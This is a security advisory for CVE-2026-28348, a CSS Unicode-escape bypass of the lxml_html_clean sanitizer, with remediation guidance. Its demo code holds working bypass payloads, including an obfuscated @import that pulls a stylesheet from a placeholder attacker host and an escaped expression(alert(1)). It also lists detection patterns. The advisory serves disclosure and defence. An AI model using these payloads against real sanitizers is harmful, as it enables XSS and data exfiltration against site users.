CVE-2026-28348 Overview
CVE-2026-28348 is a Cross-Site Scripting (XSS) and CSS injection vulnerability in lxml_html_clean, a Python project that provides HTML cleaning functionality copied from lxml.html.clean. Prior to version 0.4.4, the _has_sneaky_javascript() method strips backslashes before checking for dangerous CSS keywords. As a result, CSS Unicode escape sequences bypass the @import and expression() filters, enabling external CSS loading or XSS attacks in older browsers.
Critical Impact
Attackers can bypass HTML sanitization filters using CSS Unicode escape sequences, potentially leading to cross-site scripting attacks or loading of external malicious CSS in applications that rely on lxml_html_clean for input sanitization.
Affected Products
- lxml_html_clean versions prior to 0.4.4
- Applications using lxml_html_clean for HTML sanitization
- Python web applications relying on lxml.html.clean functionality
Discovery Timeline
- 2026-03-05 - CVE-2026-28348 published to NVD
- 2026-03-05 - Last updated in NVD database
Technical Details for CVE-2026-28348
Vulnerability Analysis
The vulnerability resides in the _has_sneaky_javascript() method within lxml_html_clean, which is responsible for detecting and filtering potentially dangerous JavaScript patterns in CSS. The method's implementation contains a flaw in how it processes CSS content before performing security checks.
When processing CSS input, the method strips backslash characters before evaluating the content against a list of dangerous keywords such as @import and expression(). This preprocessing step inadvertently enables attackers to craft CSS payloads using Unicode escape sequences that evade detection.
CSS supports Unicode escape sequences: a backslash followed by one to six hexadecimal digits (for example \69 or \000069), optionally terminated by a single whitespace character. By encoding characters of dangerous keywords with these escape sequences, an attacker can construct payloads that appear benign to the filter but are interpreted as valid CSS by browsers.
For example, the @import directive could be obfuscated using Unicode escapes, allowing an attacker to load external stylesheets from attacker-controlled domains. Similarly, the expression() function, which is supported in older versions of Internet Explorer, could be encoded to execute arbitrary JavaScript within style attributes.
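The bypass can be illustrated with a simplified model of the check. The function below is a hypothetical stand-in written for this example, not the library's actual source; it only reproduces the behavior described above (strip backslashes, then search for keywords). The attacker.example URL is a placeholder.

```python
# Simplified, hypothetical model of the pre-0.4.4 behavior described above.
# This is NOT the source code of lxml_html_clean.
def naive_has_dangerous_css(style: str) -> bool:
    # Backslashes are removed, but the hex digits of each escape remain.
    stripped = style.replace("\\", "").lower()
    return "@import" in stripped or "expression(" in stripped


plain = "@import url(https://attacker.example/x.css);"
# "\69" is the CSS escape for "i", so a browser reads this as "@import".
escaped = "@\\69mport url(https://attacker.example/x.css);"

print(naive_has_dangerous_css(plain))    # True: keyword found
print(naive_has_dangerous_css(escaped))  # False: filter sees "@69mport"
```

The second payload passes the check unchanged, while a browser decoding the escape treats it as an ordinary @import rule.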
Root Cause
The root cause is improper encoding or escaping of output (CWE-116) in the CSS security filtering logic. The _has_sneaky_javascript() method removes backslashes from CSS content before checking for dangerous patterns, which leaves the hexadecimal digits of each escape in place: @\69mport is checked as @69mport and matches no keyword. Browsers, by contrast, decode the escape sequence to the character it represents and see @import. This disconnect between what the sanitizer sees and what the browser interprets is a classic filter bypass.
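One way to close this gap is to decode escapes the way a browser would before running the keyword check. The sketch below is an assumption about how such a check could look, not the patch shipped in 0.4.4; decode_css_escapes and has_dangerous_css are hypothetical names, and the decoder simplifies the CSS rules (it does not treat escaped newlines inside strings specially).

```python
import re

# Backslash + 1-6 hex digits + one optional whitespace character,
# or backslash + any single other character (a literal escape).
_CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(.))", re.DOTALL)


def decode_css_escapes(css: str) -> str:
    """Replace CSS escape sequences with the characters they represent."""
    def _decode(match: re.Match) -> str:
        hex_digits, literal = match.group(1), match.group(2)
        if hex_digits is None:
            return literal
        code_point = int(hex_digits, 16)
        # Null, surrogates, and out-of-range values map to U+FFFD.
        if code_point == 0 or code_point > 0x10FFFF or 0xD800 <= code_point <= 0xDFFF:
            return "\ufffd"
        return chr(code_point)

    return _CSS_ESCAPE.sub(_decode, css)


def has_dangerous_css(style: str) -> bool:
    """Check for dangerous keywords after decoding, not after stripping."""
    decoded = decode_css_escapes(style).lower()
    return "@import" in decoded or "expression(" in decoded


print(has_dangerous_css("@\\69mport url(https://attacker.example/x.css);"))
print(has_dangerous_css("width: \\65xpression(alert(1))"))
print(has_dangerous_css("color: red"))
```

With decoding applied first, the sanitizer and the browser evaluate the same string, so the two escaped payloads are flagged and the benign rule is not.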
Attack Vector
The attack requires user interaction: a victim must view content containing the malicious CSS payload. The payload can be delivered through any application input that is processed by lxml_html_clean, such as user-generated content, comment fields, or other HTML input that undergoes sanitization. When the sanitized content is rendered in a browser, the CSS Unicode escape sequences are decoded and the malicious directives take effect.
The vulnerability specifically targets:
- External CSS loading via obfuscated @import statements, which can be used for data exfiltration or content injection
- XSS execution via the expression() function in legacy Internet Explorer browsers
The attack is network-based and requires no privileges on the target system; it is triggered when a victim renders the content. The scope is changed, meaning successful exploitation can impact resources beyond the vulnerable component.
Detection Methods for CVE-2026-28348
Indicators of Compromise
- CSS content containing unusual Unicode escape sequences, particularly patterns like \0040import or \0065xpression
- Web application logs showing style attributes or CSS blocks with multiple backslash-escaped characters
- Requests to external stylesheets from unexpected or unknown domains referenced in user-generated content
- Browser console errors related to blocked CSS resources when Content Security Policy is enforced
Detection Strategies
- Implement input validation rules to detect CSS content with Unicode escape sequences in style-related contexts
- Monitor for anomalous CSS patterns in user-submitted content, particularly escape sequences near CSS function calls or directives
- Deploy web application firewall (WAF) rules to flag CSS content containing obfuscated @import or expression() patterns
- Review application dependencies to identify usage of lxml_html_clean versions prior to 0.4.4
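The first two strategies above can be sketched as a small scanner that flags hexadecimal CSS escapes inside style elements and style attributes. This is a rough heuristic under stated assumptions: find_css_escapes is a hypothetical helper, the regular expressions are not a full HTML parser, and legitimate stylesheets also use escapes (for example in content: values), so hits should be reviewed rather than blocked outright.

```python
import re

# Backslash followed by 1-6 hex digits: the CSS Unicode escape form.
CSS_HEX_ESCAPE = re.compile(r"\\[0-9a-fA-F]{1,6}")

# Style contexts: <style>...</style> bodies and quoted style="..." attributes.
STYLE_CONTEXT = re.compile(
    r"<style\b[^>]*>(.*?)</style\s*>|\bstyle\s*=\s*(\"[^\"]*\"|'[^']*')",
    re.IGNORECASE | re.DOTALL,
)


def find_css_escapes(html: str) -> list[str]:
    """Return every hex escape found inside a style element or attribute."""
    hits: list[str] = []
    for match in STYLE_CONTEXT.finditer(html):
        css = match.group(1) if match.group(1) is not None else match.group(2)
        hits.extend(CSS_HEX_ESCAPE.findall(css))
    return hits


sample = '<p style="width: \\65xpression(alert(1))">hello</p>'
print(find_css_escapes(sample))
```

Escapes outside style contexts are ignored on purpose, which keeps noise down when scanning stored user content or request logs.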
Monitoring Recommendations
- Enable verbose logging for HTML sanitization operations to capture potentially malicious input attempts
- Configure Content Security Policy (CSP) headers with style-src directives to restrict external stylesheet loading
- Implement real-time monitoring for outbound connections to unknown domains that could indicate CSS-based data exfiltration
- Set up dependency vulnerability scanning to alert on outdated lxml_html_clean versions in your software supply chain
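The CSP recommendation above could be applied in a Python web stack with a small WSGI wrapper. This is a minimal sketch: with_csp and DEFAULT_POLICY are hypothetical names, and the policy shown is an assumption that must be adapted to the application. Note that style-src 'self' without 'unsafe-inline' also blocks inline style attributes and style elements.

```python
# Assumed example policy; adjust the sources to the application's needs.
DEFAULT_POLICY = "default-src 'self'; style-src 'self'"


def with_csp(app, policy: str = DEFAULT_POLICY):
    """Wrap a WSGI app so every response carries a Content-Security-Policy."""
    def wrapped(environ, start_response):
        def _start_response(status, headers, exc_info=None):
            # Drop any existing CSP header so only one policy is sent.
            headers = [
                (name, value)
                for name, value in headers
                if name.lower() != "content-security-policy"
            ]
            headers.append(("Content-Security-Policy", policy))
            return start_response(status, headers, exc_info)

        return app(environ, _start_response)

    return wrapped
```

Because stylesheets fetched through @import are governed by style-src, a policy like this limits the impact of a bypassed sanitizer even before the library is upgraded.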
How to Mitigate CVE-2026-28348
Immediate Actions Required
- Upgrade lxml_html_clean to version 0.4.4 or later immediately
- Review and audit all user-generated content that may have been processed by vulnerable versions
- Implement Content Security Policy headers to restrict inline styles and external stylesheet sources as a defense-in-depth measure
- Consider adding secondary validation for CSS content in security-critical applications
Patch Information
The vulnerability has been patched in lxml_html_clean version 0.4.4. The fix addresses the backslash stripping behavior in the _has_sneaky_javascript() method to properly handle CSS Unicode escape sequences before security filtering.
For detailed information about the fix, refer to the GitHub Security Advisory and the commit implementing the patch.
Workarounds
- Implement additional CSS validation logic at the application layer that decodes Unicode escape sequences before filtering
- Use Content Security Policy headers with strict style-src directives to block external CSS and inline styles where feasible
- Disable or filter the expression() function and @import directive at the application level as an additional layer of defense
- Consider using alternative HTML sanitization libraries that properly handle CSS Unicode escape sequences if upgrading is not immediately possible
# Upgrade lxml_html_clean to patched version
pip install --upgrade "lxml_html_clean>=0.4.4"
# Verify installed version
pip show lxml_html_clean | grep Version
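The same version check can be run from Python, for instance in a startup check or CI job. The sketch below uses only the standard library; parse_release, is_patched, and installed_status are hypothetical helpers, and the parser is deliberately simple: it reads only the leading numeric components, so a pre-release such as 0.4.4rc1 would be treated as 0.4.4.

```python
from importlib.metadata import PackageNotFoundError, version

PATCHED = (0, 4, 4)  # first fixed release according to the advisory


def parse_release(raw: str) -> tuple:
    """Extract leading numeric components, e.g. '0.4.3' -> (0, 4, 3)."""
    parts = []
    for piece in raw.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def is_patched(raw: str) -> bool:
    release = parse_release(raw)
    # Pad short versions such as '0.5' to three components before comparing.
    padded = release + (0,) * (len(PATCHED) - len(release))
    return padded >= PATCHED


def installed_status(dist: str = "lxml_html_clean") -> str:
    try:
        found = version(dist)
    except PackageNotFoundError:
        return "not installed"
    return f"{found} ({'patched' if is_patched(found) else 'VULNERABLE'})"


if __name__ == "__main__":
    print(installed_status())
```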

